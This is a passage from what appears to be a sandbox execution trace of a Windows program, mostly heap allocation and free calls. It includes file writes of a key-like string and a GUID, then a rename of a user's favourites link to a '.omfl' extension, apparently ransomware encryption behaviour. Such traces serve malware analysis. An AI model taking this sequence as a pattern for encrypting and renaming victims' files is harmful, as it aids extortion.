returned 1 [0132.474] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757c4e0 | out: hHeap=0x4970000) returned 1 [0132.474] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7503670 | out: hHeap=0x4970000) returned 1 [0132.474] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdf28 | out: hHeap=0x4970000) returned 1 [0132.474] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7481e18 | out: hHeap=0x4970000) returned 1 [0132.474] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74cdbc8 | out: hHeap=0x4970000) returned 1 [0132.474] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd08ea8 | out: hHeap=0x4970000) returned 1 [0132.474] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e4b90 | out: hHeap=0x4970000) returned 1 [0132.474] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb28 | out: hHeap=0x4970000) returned 1 [0132.474] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0132.474] WriteFile (in: hFile=0x610, lpBuffer=0xdd12730*, nNumberOfBytesToWrite=0xdd, lpNumberOfBytesWritten=0xe00fb14, lpOverlapped=0x0 | out: lpBuffer=0xdd12730*, lpNumberOfBytesWritten=0xe00fb14*=0xdd, lpOverlapped=0x0) returned 1 [0132.475] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd12730 | out: hHeap=0x4970000) returned 1 [0132.475] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0xe2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.475] WriteFile (in: hFile=0x610, lpBuffer=0xdd24578*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0xdd24578*, lpNumberOfBytesWritten=0xe00fb50*=0x100, lpOverlapped=0x0) returned 1 [0132.475] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24578 | out: hHeap=0x4970000) returned 1 [0132.475] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x60) returned 0xdcf5e28 [0132.475] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x428) returned 0xdd19550 [0132.475] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", cchWideChar=-1, lpMultiByteStr=0xdd19550, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", lpUsedDefaultChar=0x0) returned 41 [0132.475] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x430) returned 0x757b548 [0132.475] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd19550 | out: hHeap=0x4970000) returned 1 [0132.475] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5e28 | out: hHeap=0x4970000) returned 1 [0132.475] WriteFile (in: hFile=0x610, lpBuffer=0x757b548*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x757b548*, lpNumberOfBytesWritten=0xe00fb50*=0x28, lpOverlapped=0x0) returned 1 [0132.475] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x757b548 | out: hHeap=0x4970000) returned 1 [0132.475] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0132.475] WriteFile (in: hFile=0x610, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0xe00fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0xe00fb50*=0x26, lpOverlapped=0x0) returned 1 [0132.475] CloseHandle (hObject=0x610) returned 1 [0132.481] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x90) returned 0xdd145f8 [0132.481] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x8a0) returned 0x74fb288 [0132.481] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd145f8 | out: hHeap=0x4970000) returned 1 [0132.481] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\Web Slice Gallery.url.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\links\\web slice gallery.url.omfl")) returned 1 [0132.483] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0132.483] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0132.483] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.485] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd14728 | out: hHeap=0x4970000) returned 1 [0132.485] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d9517a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Web Slice Gallery.url", cAlternateFileName="WEBSLI~1.URL")) returned 0 [0132.485] FindClose (in: hFindFile=0xdce3b70 | out: hFindFile=0xdce3b70) returned 1 [0132.486] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca80 | out: hHeap=0x4970000) returned 1 [0132.486] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf5dc0 | out: hHeap=0x4970000) returned 1 [0132.486] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0132.486] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d1c58 [0132.486] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0132.486] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0132.486] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0132.486] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0132.486] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2e68 | out: hHeap=0x4970000) returned 1 [0132.486] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0132.486] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0132.486] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0132.486] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2e68 | out: hHeap=0x4970000) returned 1 [0132.486] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0132.486] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0132.486] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0132.486] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2e68 | out: hHeap=0x4970000) returned 1 [0132.486] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0132.486] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0132.486] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0132.486] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2e68 | out: hHeap=0x4970000) returned 1 [0132.486] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0132.486] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0132.486] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0132.487] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2e68 | out: hHeap=0x4970000) returned 1 [0132.487] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0132.487] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0132.487] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0132.487] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2e68 | out: hHeap=0x4970000) returned 1 [0132.487] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0132.487] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0132.487] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0xdd29950 [0132.487] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0132.487] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd29950 | out: hHeap=0x4970000) returned 1 [0132.487] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2e68 | out: hHeap=0x4970000) returned 1 [0132.487] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0132.487] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0132.487] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0132.487] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2e68 | out: hHeap=0x4970000) returned 1 [0132.487] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0132.487] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0132.487] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0132.487] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2e68 | out: hHeap=0x4970000) returned 1 [0132.487] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0132.487] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x74fb288 [0132.487] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0132.487] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2e68 | out: hHeap=0x4970000) returned 1 [0132.487] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0132.487] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x74fb288 [0132.487] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0132.487] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2e68 | out: hHeap=0x4970000) returned 1 [0132.487] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0132.488] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0132.488] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0132.488] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2e68 | out: hHeap=0x4970000) returned 1 [0132.488] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0132.488] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0132.488] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0132.488] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2e68 | out: hHeap=0x4970000) returned 1 [0132.488] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0132.488] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0132.488] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0132.488] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2e68 | out: hHeap=0x4970000) returned 1 [0132.488] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0132.488] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0132.488] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0132.488] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2e68 | out: hHeap=0x4970000) returned 1 [0132.488] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0132.488] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0132.488] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0132.488] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2e68 | out: hHeap=0x4970000) returned 1 [0132.488] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0132.488] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0132.488] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0132.488] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2e68 | out: hHeap=0x4970000) returned 1 [0132.488] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0132.488] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0132.488] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0132.488] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2e68 | out: hHeap=0x4970000) returned 1 [0132.488] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0132.488] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0132.488] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0132.489] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2e68 | out: hHeap=0x4970000) returned 1 [0132.489] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0132.489] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0132.489] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0132.489] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2e68 | out: hHeap=0x4970000) returned 1 [0132.489] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0132.489] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0132.489] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0132.489] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2e68 | out: hHeap=0x4970000) returned 1 [0132.489] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0132.489] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0132.489] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0132.489] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2e68 | out: hHeap=0x4970000) returned 1 [0132.489] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0132.489] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0132.489] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0xdd29950 [0132.489] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0132.489] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd29950 | out: hHeap=0x4970000) returned 1 [0132.489] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2e68 | out: hHeap=0x4970000) returned 1 [0132.489] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0132.489] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0132.489] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0132.489] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2e68 | out: hHeap=0x4970000) returned 1 [0132.489] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0132.489] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0132.489] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0xdd29950 [0132.489] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0132.489] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd29950 | out: hHeap=0x4970000) returned 1 [0132.489] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2e68 | out: hHeap=0x4970000) returned 1 [0132.489] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0132.490] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x74fb288 [0132.490] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0132.490] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2e68 | out: hHeap=0x4970000) returned 1 [0132.490] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0132.490] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x74fb288 [0132.490] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0132.490] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2e68 | out: hHeap=0x4970000) returned 1 [0132.490] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0132.490] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0132.490] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0132.490] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2e68 | out: hHeap=0x4970000) returned 1 [0132.490] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0132.490] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0132.490] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0132.490] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2e68 | out: hHeap=0x4970000) returned 1 [0132.490] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0132.490] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0132.490] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0xdd29950 [0132.490] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0132.490] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd29950 | out: hHeap=0x4970000) returned 1 [0132.490] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2e68 | out: hHeap=0x4970000) returned 1 [0132.490] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0132.490] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0132.490] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0132.490] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2e68 | out: hHeap=0x4970000) returned 1 [0132.490] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0132.490] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0132.490] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0132.491] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2e68 | out: hHeap=0x4970000) returned 1 [0132.491] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0132.491] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0132.491] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0132.491] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2e68 | out: hHeap=0x4970000) returned 1 [0132.491] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0132.491] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0132.491] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0132.491] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2e68 | out: hHeap=0x4970000) returned 1 [0132.491] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0132.491] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0132.491] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0132.491] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2e68 | out: hHeap=0x4970000) returned 1 [0132.491] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0132.491] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0132.491] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0132.491] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2e68 | out: hHeap=0x4970000) returned 1 [0132.491] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0132.491] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0132.491] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0132.491] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2e68 | out: hHeap=0x4970000) returned 1 [0132.491] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0132.491] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0132.491] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0132.491] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2e68 | out: hHeap=0x4970000) returned 1 [0132.491] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0132.491] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0132.491] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0132.491] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2e68 | out: hHeap=0x4970000) returned 1 [0132.492] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0132.492] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0132.492] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0xdd29950 [0132.492] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0132.492] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd29950 | out: hHeap=0x4970000) returned 1 [0132.492] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2e68 | out: hHeap=0x4970000) returned 1 [0132.492] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0132.492] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0132.492] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0132.492] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2e68 | out: hHeap=0x4970000) returned 1 [0132.492] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0132.492] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x74fb288 [0132.492] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0132.492] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2e68 | out: hHeap=0x4970000) returned 1 [0132.492] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0132.492] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x74fb288 [0132.492] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0132.492] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2e68 | out: hHeap=0x4970000) returned 1 [0132.492] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x80) returned 0x49d2e68 [0132.492] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0132.492] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0132.492] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2e68 | out: hHeap=0x4970000) returned 1 [0132.492] RtlAllocateHeap 